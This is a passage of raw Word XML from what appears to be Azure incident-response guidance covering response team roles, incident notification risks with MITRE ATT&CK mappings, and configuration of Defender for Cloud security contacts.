    <w:p w14:paraId="573E6121" w14:textId="4F957C36" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Correlation between Defender for Cloud alert severities and organizational incident classification levels (Defender for Cloud alert severity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA2838" w14:textId="1EC9675D" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Automated Workflow Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A86B1" w14:textId="0FAE540C" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Automated incident creation and notification workflows using Logic Apps triggered by high-severity security alerts (Workflow automation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447CEDF1" w14:textId="1BE0B41D" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Regulatory Notification Templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B5C7B3" w14:textId="0DA7D27F" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Pre-configured notification templates for GDPR, HIPAA, PCI-DSS, and other regulatory requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7926DF19" w14:textId="2AEB4551" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Evidence Export Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F195BCF" w14:textId="72B635E2" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Systematic procedures for exporting security findings, recommendations, and alert data for incident documentation (Continuous export).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2E142B" w14:textId="77777777" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00E41A4A"/>
    <w:p w14:paraId="2FC585A0" w14:textId="77777777" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00E41A4A"/>
    <w:p w14:paraId="7E0B7655" w14:textId="77777777" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00E41A4A"/>
    <w:p w14:paraId="1057248C" w14:textId="77777777" w:rsidR="002B41B7" w:rsidRDefault="002B41B7" w:rsidP="00E41A4A"/>
    <w:p w14:paraId="117782C2" w14:textId="1FD1BACB" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00E41A4A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IR-1.2: Establish incident response team structure and training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48CE5E" w14:textId="77777777" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Build Azure incident response capability through specialized team structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE1372" w14:textId="4F652739" w:rsidR="00830ED5" w:rsidRPr="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Establish dedicated incident response teams with clearly defined roles, responsibilities, and decision-making authority for Azure environments. Microsoft Security Academy and Microsoft Defender for Cloud training materials provide specialized cloud incident response training.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B089839" w14:textId="39584762" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Azure-Focused Team Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC29E21" w14:textId="6C8C95FF" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Cloud Security Analysts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0307065C" w14:textId="0EBDAB1B" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1170"/>
        </w:tabs>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Specialized</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E41A4A">
        <w:t xml:space="preserve"> in Azure security services, log analysis, and cloud-native investigation techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A303986" w14:textId="54B0C72B" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Azure Solution Architects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DAC7FD" w14:textId="12B33EC5" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Understanding of Azure service configurations, network topologies, and architectural security implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0442D053" w14:textId="128C93CF" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Legal and Compliance Representatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069C36CE" w14:textId="2013ED80" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Knowledge of cloud-specific regulatory requirements and Microsoft collaboration procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E93A366" w14:textId="513A840F" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Business Continuity Coordinators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61694E53" w14:textId="5D6727C5" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Expertise in Azure disaster recovery, backup restoration, and service continuity planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDBC17D" w14:textId="1405B4D3" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>External Escalation Contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C01B2" w14:textId="0D6803EC" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Established relationships with Microsoft Support, legal counsel, and regulatory notification contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6FAD5" w14:textId="41712E10" w:rsidR="00DC2CC4" w:rsidRDefault="00E41A4A" w:rsidP="00E41A4A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc242449536"/>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>IR-2: Preparation - setup incident notification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="13CDAF38" w14:textId="7EA9DD54" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F20DE" w14:textId="19A73B19" w:rsidR="00001F1F" w:rsidRPr="00001F1F" w:rsidRDefault="00001F1F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00001F1F">
        <w:t xml:space="preserve">Establish comprehensive incident notification systems with automated triggering, appropriate stakeholder </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00001F1F">
        <w:t>contact</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00001F1F">
        <w:t xml:space="preserve"> lists, and integration with Microsoft security services to ensure rapid, accurate, and compliant incident communication across all required parties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326107AF" w14:textId="03F2281D" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30DB26D3" w14:textId="5D7AFAAB" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Delayed stakeholder awareness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A606FB" w14:textId="17ED3780" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Executives, legal teams, and responders remain unaware, preventing timely decisions and resource allocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252AB2F1" w14:textId="359F714E" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Regulatory violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38191F62" w14:textId="73004DD8" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Missed notification timelines (GDPR 72-hour, HIPAA 60-day, PCI-DSS immediate) trigger fines and sanctions. (References: GDPR Articles 33/34, HIPAA Breach Notification Rule, PCI-DSS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAE6A33" w14:textId="3BB995F5" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:lastRenderedPageBreak/>
        <w:t>Ineffective cloud provider collaboration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C674C" w14:textId="44EA06B4" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Failure to properly configure cloud security contacts prevents collaboration with cloud provider security response teams during platform-level incidents or when provider assistance is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA45F40" w14:textId="5376C381" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Customer trust erosion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72440E48" w14:textId="3A573E6A" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t xml:space="preserve">Delayed or inadequate customer notification during incidents involving personal data or service disruptions damages relationships and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>creates</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E41A4A">
        <w:t xml:space="preserve"> legal exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32591AC3" w14:textId="4FCAFDDB" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Uncoordinated response efforts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D76363" w14:textId="5E01C6A7" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Lack of automated notification triggers and escalation procedures results in fragmented response efforts with multiple teams working without coordination or situational awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255C4A2" w14:textId="5DBC2641" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Delayed response coordination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBAD451" w14:textId="5C6564B7" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E41A4A">
        <w:t>Slow notification to forensics teams, legal counsel, and technical responders delays critical containment actions, evidence preservation procedures, and coordinated defensive measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD8A4B" w14:textId="1897DB47" w:rsidR="00833BE7" w:rsidRDefault="00833BE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00833BE7">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4B555F" w14:textId="6A86D9EE" w:rsidR="00833BE7" w:rsidRDefault="00833BE7" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00833BE7">
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1915DF8E" w14:textId="28B8EB95" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00830ED5">
        <w:t>application layer protocol (T1071) maintaining command and control channels longer when delayed stakeholder notification prevents coordinated network-level containment actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE58EE" w14:textId="3368E814" w:rsidR="00833BE7" w:rsidRDefault="00833BE7" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00833BE7">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5196B9" w14:textId="3A093BB2" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00830ED5">
        <w:t>exfiltration over C2 channel (T1041) completing data theft during notification and escalation delays before cross-team coordination enables effective blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479706EC" w14:textId="19951CD1" w:rsidR="00833BE7" w:rsidRDefault="00833BE7" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00833BE7">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303CD985" w14:textId="448A870C" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00830ED5">
        <w:t>data encrypted for impact (T1486) spreading ransomware across multiple systems while delayed notification prevents rapid isolation and backup recovery coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4760DA19" w14:textId="0A90797D" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00E753AE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-2.1: Configure Microsoft security contact information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E305D5F" w14:textId="77777777" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Enable Microsoft collaboration through verified security contacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029655CC" w14:textId="52508E77" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Configure security contact information in Microsoft Defender for Cloud and establish comprehensive contact management so Microsoft can reach appropriate personnel during incidents requiring collaboration or platform-level response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE8E50" w14:textId="77777777" w:rsidR="002B41B7" w:rsidRPr="00830ED5" w:rsidRDefault="002B41B7" w:rsidP="002B41B7"/>
    <w:p w14:paraId="5E976BC5" w14:textId="2C183F4F" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:lastRenderedPageBreak/>
        <w:t>Microsoft Defender for Cloud security contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F4B918" w14:textId="08C140C8" w:rsidR="00E753AE" w:rsidRDefault="00E753AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Primary security contact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD94FEE" w14:textId="2046B0CD" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>24/7 reachable security team representative with incident response authority and decision-making capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D2EDB9" w14:textId="0908C6AA" w:rsidR="00E753AE" w:rsidRDefault="00E753AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Secondary Contact Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614FD656" w14:textId="629BE42D" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Backup contacts with geographic distribution for global organizations ensuring coverage across time zones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B118CDF" w14:textId="292632D8" w:rsidR="00E753AE" w:rsidRDefault="00E753AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Role-Based Contact Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4935CC" w14:textId="39795053" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Separate contacts for different incident types including data breaches, platform vulnerabilities, and service disruptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A1D4E" w14:textId="6DEBAE8D" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
